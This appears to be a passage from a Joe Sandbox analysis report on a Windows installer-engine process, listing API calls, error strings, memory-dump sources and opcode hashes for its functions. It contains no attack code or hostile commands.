                                                                                                                • Failed to reset permissions on unverified cached payload: %ls, xrefs: 009B9FF1
                                                                                                                • Failed to get cached path for package with cache id: %ls, xrefs: 009B9EC8
                                                                                                                • Failed to concat complete cached path., xrefs: 009B9EF4
                                                                                                                • copying, xrefs: 009BA030, 009BA038
                                                                                                                • moving, xrefs: 009BA029
                                                                                                                • Failed to transfer working path to unverified path for payload: %ls., xrefs: 009B9FA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
                                                                                                                • API String ID: 0-1289240508
                                                                                                                • Opcode ID: ed7f325cb232a05a99e7a55fdb208cdf85e61f992707f3e9b27087a11a6f3625
                                                                                                                • Instruction ID: 10a51947b52c56f299081fd2cbd4426ce3d592cd74af8332de2874bac8b2b02f
                                                                                                                • Opcode Fuzzy Hash: ed7f325cb232a05a99e7a55fdb208cdf85e61f992707f3e9b27087a11a6f3625
                                                                                                                • Instruction Fuzzy Hash: A4517E31944219FBDF236FA4CE06FED7B76AF55720F104051FA00B61A1E7769EA0AB81
                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(0000011C), ref: 009A62F8
                                                                                                                • GetLastError.KERNEL32 ref: 009A6302
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastVersion
                                                                                                                • String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                                                                                • API String ID: 305913169-1971907631
                                                                                                                • Opcode ID: c9b9e84219ddee78ceaba04cc55944e715c2f071ad41b959c2efdc97a5ea2b4c
                                                                                                                • Instruction ID: 2e4d17086429ebb3fb0e595f349d4ba518b3dedae1fb3d4d6f4ea11cedf73b43
                                                                                                                • Opcode Fuzzy Hash: c9b9e84219ddee78ceaba04cc55944e715c2f071ad41b959c2efdc97a5ea2b4c
                                                                                                                • Instruction Fuzzy Hash: 1841D672E04228ABDB20DB59CC45FEF7BB8EB8A720F04055AF555E7150DA349E41CBD0
                                                                                                                APIs
                                                                                                                • GetSystemTime.KERNEL32(?), ref: 009A6062
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 009A6076
                                                                                                                • GetLastError.KERNEL32 ref: 009A6088
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 009A60DC
                                                                                                                • GetLastError.KERNEL32 ref: 009A60E6
                                                                                                                Strings
                                                                                                                • Failed to get the required buffer length for the Date., xrefs: 009A60AD
                                                                                                                • Failed to set variant value., xrefs: 009A6124
                                                                                                                • Failed to get the Date., xrefs: 009A610B
                                                                                                                • variable.cpp, xrefs: 009A60A3, 009A6101
                                                                                                                • Failed to allocate the buffer for the Date., xrefs: 009A60C4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DateErrorFormatLast$SystemTime
                                                                                                                • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                                                                • API String ID: 2700948981-3682088697
                                                                                                                • Opcode ID: 03a9812e3bf5572d9e54ede1bdf705e8d2a85e175ac58f39ee064ee63f2b4edd
                                                                                                                • Instruction ID: 2484396d4ec5b9215940b0873c4a51f0eb262d771408a6b5dcecf41f81b4a775
                                                                                                                • Opcode Fuzzy Hash: 03a9812e3bf5572d9e54ede1bdf705e8d2a85e175ac58f39ee064ee63f2b4edd
                                                                                                                • Instruction Fuzzy Hash: 8631FD72E442696BDB229BEACC82FBF7BB8AB45710F110429FF00F7181D6649D4086E1
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(00A0B5FC,00000000,?,?,?,?,009C12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009DFEF4
                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,009C12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009DFF04
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 009DFF0D
                                                                                                                • GetLocalTime.KERNEL32(8007139F,?,009C12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009DFF23
                                                                                                                • LeaveCriticalSection.KERNEL32(00A0B5FC,009C12CF,?,00000000,0000FDE9,?,009C12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009E001A
                                                                                                                Strings
                                                                                                                • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 009DFFC0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                • API String ID: 296830338-59366893
                                                                                                                • Opcode ID: 36baa2af858f5828dff9ca940e290d583589e7b90c8fdce277a824250f11ae26
                                                                                                                • Instruction ID: 9367ca84446d29fc5a7f4b945c05fc63121aa926c3db047b6be7abc1879facb9
                                                                                                                • Opcode Fuzzy Hash: 36baa2af858f5828dff9ca940e290d583589e7b90c8fdce277a824250f11ae26
                                                                                                                • Instruction Fuzzy Hash: 5F41B231D0021DABCF21CFA9DC45BBFB7B8EB48B11F004426F901A6290D7359D81DBA0
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 009B9BF2
                                                                                                                • lstrlenW.KERNEL32(?), ref: 009B9C19
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 009B9C79
                                                                                                                • FindClose.KERNEL32(00000000), ref: 009B9C84
                                                                                                                  • Part of subcall function 009A3CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 009A3D40
                                                                                                                  • Part of subcall function 009A3CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009A3D53
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                                                                • String ID: *.*$.unverified
                                                                                                                • API String ID: 457978746-2528915496
                                                                                                                • Opcode ID: 559ff68d8b9b116dff34a7a63b04e8a16ea4ff9127f003e9f3fe65e966998e80
                                                                                                                • Instruction ID: e53dd66306096468acc5229b71f0af9b5a07edc31335b3c75bfc7a59dee37bf5
                                                                                                                • Opcode Fuzzy Hash: 559ff68d8b9b116dff34a7a63b04e8a16ea4ff9127f003e9f3fe65e966998e80
                                                                                                                • Instruction Fuzzy Hash: 6941933091056CAECB21AF64DE49BEA7BFCEF84311F1001A5EA49E10A1EB758EC4DF54
                                                                                                                APIs
                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 009E88D0
                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 009E88E2
                                                                                                                Strings
                                                                                                                • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 009E88B9
                                                                                                                • feclient.dll, xrefs: 009E88AA
                                                                                                                • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 009E892D
                                                                                                                • crypt32.dll, xrefs: 009E88A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                                                                                • API String ID: 1772835396-1985132828
                                                                                                                • Opcode ID: d6eeeb5befffd0a11535ca7548e6e70a01da3f0aa83f3cbd7f16e4a8d0c97d63
                                                                                                                • Instruction ID: 7c0004db3407b72b7f988e35b9b520a4569a33717d03b49690899f6e6a418dbb
                                                                                                                • Opcode Fuzzy Hash: d6eeeb5befffd0a11535ca7548e6e70a01da3f0aa83f3cbd7f16e4a8d0c97d63
                                                                                                                • Instruction Fuzzy Hash: 0A21E6A6900128EADB60DB9ADC05FBBB3FCEB58711F00455ABA55D6180E6389A80D771
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __floor_pentium4
                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                • Opcode ID: 931c974cbb43b522c56c6578d5d912a2daa91a61c1ac397f458db377bba2037f
                                                                                                                • Instruction ID: b5d9d5f28d537cfee6eb10db282e5dc908c75c439935aa9db748432bcb0ccc3a
                                                                                                                • Opcode Fuzzy Hash: 931c974cbb43b522c56c6578d5d912a2daa91a61c1ac397f458db377bba2037f
                                                                                                                • Instruction Fuzzy Hash: DCC22872E446288BDB25CE28DD407EAB3B9EB94314F1585EBD44DE7340E778AE818F41
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastNameUser
                                                                                                                • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                                                                • API String ID: 2054405381-1522884404
                                                                                                                • Opcode ID: cac11a1dde201d85d4044356ba039e19a71e8785d8dd8822b19261c82ee1ac3d
                                                                                                                • Instruction ID: f30fcf9dc8ea2c7568edb9de6ef34a8b5a3706ea1eec29268d78ac34e2b0a7bd
                                                                                                                • Opcode Fuzzy Hash: cac11a1dde201d85d4044356ba039e19a71e8785d8dd8822b19261c82ee1ac3d
                                                                                                                • Instruction Fuzzy Hash: 39014972E4132C67C721DB558C0AFAF77ACAB41720F000259FC20E7241DB749E418AD1
                                                                                                                APIs
                                                                                                                • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,009E04F4,?,?,?,?,00000001), ref: 009DFE40
                                                                                                                • GetLastError.KERNEL32(?,009E04F4,?,?,?,?,00000001,?,009A5616,?,?,00000000,?,?,009A5395,00000002), ref: 009DFE4C
                                                                                                                • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,009E04F4,?,?,?,?,00000001,?,009A5616,?,?), ref: 009DFEB5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                • String ID: logutil.cpp
                                                                                                                • API String ID: 1365068426-3545173039
                                                                                                                • Opcode ID: 8544436b2f598ff6bf61098ffc561971d79323fd5fbe46c48a3073ff54f98bbc
                                                                                                                • Instruction ID: 88c4c341702e04289207a042b21bc1a370b9a9ec765437bc9615b45e2de4344f
                                                                                                                • Opcode Fuzzy Hash: 8544436b2f598ff6bf61098ffc561971d79323fd5fbe46c48a3073ff54f98bbc
                                                                                                                • Instruction Fuzzy Hash: 5711C432640129EBDB319F85DD16EAF7B68FF54711F01802AFD069A271D7319E20E6B0
                                                                                                                APIs
                                                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,009C6B32,00000000,00000003), ref: 009C6B9F
                                                                                                                • GetLastError.KERNEL32(?,009C6B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,009C6F28,?), ref: 009C6BA9
                                                                                                                Strings
                                                                                                                • Failed to set service start type., xrefs: 009C6BD7
                                                                                                                • msuengine.cpp, xrefs: 009C6BCD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ChangeConfigErrorLastService
                                                                                                                • String ID: Failed to set service start type.$msuengine.cpp
                                                                                                                • API String ID: 1456623077-1628545019
                                                                                                                • Opcode ID: 54f4fb3fe3327ca3f96fb20d3a551287dec43b22da1603fa5dc463ebd78369be
                                                                                                                • Instruction ID: cb20d3e9d55dc0fb71a30d61bb584e26ee58599e61b3250d4ae4c887a3a704da
                                                                                                                • Opcode Fuzzy Hash: 54f4fb3fe3327ca3f96fb20d3a551287dec43b22da1603fa5dc463ebd78369be
                                                                                                                • Instruction Fuzzy Hash: 8FF0E533A4D13A778B31269A9C09F9B7E58AF01BB1B110325FF38FA2D0DB559D0092E5
                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 009D3D6E
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 009D3D78
                                                                                                                • UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 009D3D85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                • String ID:
                                                                                                                • API String ID: 3906539128-0
                                                                                                                • Opcode ID: 5629bbfec06ce0e5a291746b36bc15d4ec3e971d2e7812d7dcfed756068ec81a
                                                                                                                • Instruction ID: 2cb79855f64c5957113ffbf908a4418dc0c9d5f1600e92f1329737603f8fd29c
                                                                                                                • Opcode Fuzzy Hash: 5629bbfec06ce0e5a291746b36bc15d4ec3e971d2e7812d7dcfed756068ec81a
                                                                                                                • Instruction Fuzzy Hash: EA31F474D5122C9BCB21DF64D989B8DBBB8BF08310F5081EAE80CA7251E7309F818F45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                • Instruction ID: 49e505347c6ce886517103da75ffac7be64710923900b2f044ba9efcbd0191d2
                                                                                                                • Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                • Instruction Fuzzy Hash: 75022B71E402199FDF14CFA9C8906ADB7F5EF88324F25826AD819E7384D730AE51CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E3BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,009E3A8E,?), ref: 009E3C62
                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009E3AB2
                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009E3AC3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 2114926846-0
                                                                                                                • Opcode ID: 7d6df3b082e277f737a7aa7ce37d86b346bcbc7e6bc78a0d7126986867e17eba
                                                                                                                • Instruction ID: 6d35e845ffb4ba0cb9b38428ac2cfa43696d97b66836ea7f8923d9026c61d67f
                                                                                                                • Opcode Fuzzy Hash: 7d6df3b082e277f737a7aa7ce37d86b346bcbc7e6bc78a0d7126986867e17eba
                                                                                                                • Instruction Fuzzy Hash: A911F77190025EABDB11DFA5DC89BAFB7BCFF08304F548829A541A7151E7709E448B51
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(009C923A,?,00000100,00000000,00000000), ref: 009E447B
                                                                                                                • FindClose.KERNEL32(00000000), ref: 009E4487
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: a8d62bb9353eb45c83ae1583b0e1aa57e352b5de87e3014264bdba2c8af4c2b9
                                                                                                                • Instruction ID: 6a8e61af1a04369388dab05811bc57c60f1372397320e421eb699fcbff470bc1
                                                                                                                • Opcode Fuzzy Hash: a8d62bb9353eb45c83ae1583b0e1aa57e352b5de87e3014264bdba2c8af4c2b9
                                                                                                                • Instruction Fuzzy Hash: 0601F932B0024C6BCB10EFA6ED89FABB3ACEBC5325F000065F915C7190E6345D498754
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0$comres.dll
                                                                                                                • API String ID: 0-3030269839
                                                                                                                • Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                                                                • Instruction ID: dc98c70fbe60798b3764e1b196ddd74da5c265b5724b48adeb2dc9db7668ce4c
                                                                                                                • Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                                                                • Instruction Fuzzy Hash: CA517C602D4B0457DB384B7845957BF239E9B76381F18C9ABE8C3DB3D2C60ADE418362
                                                                                                                APIs
                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009DEE77,?,?,00000008,?,?,009DEB17,00000000), ref: 009DF0A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise
                                                                                                                • String ID:
                                                                                                                • API String ID: 3997070919-0
                                                                                                                • Opcode ID: 38c6f03264848e77b8e8ac19178cc17413c1035ce828f3b3f280f38c9097eddd
                                                                                                                • Instruction ID: 842289a4b573eeffe031028adebaea8e98297ec4fc940e5efc9ba4ac04fb740b
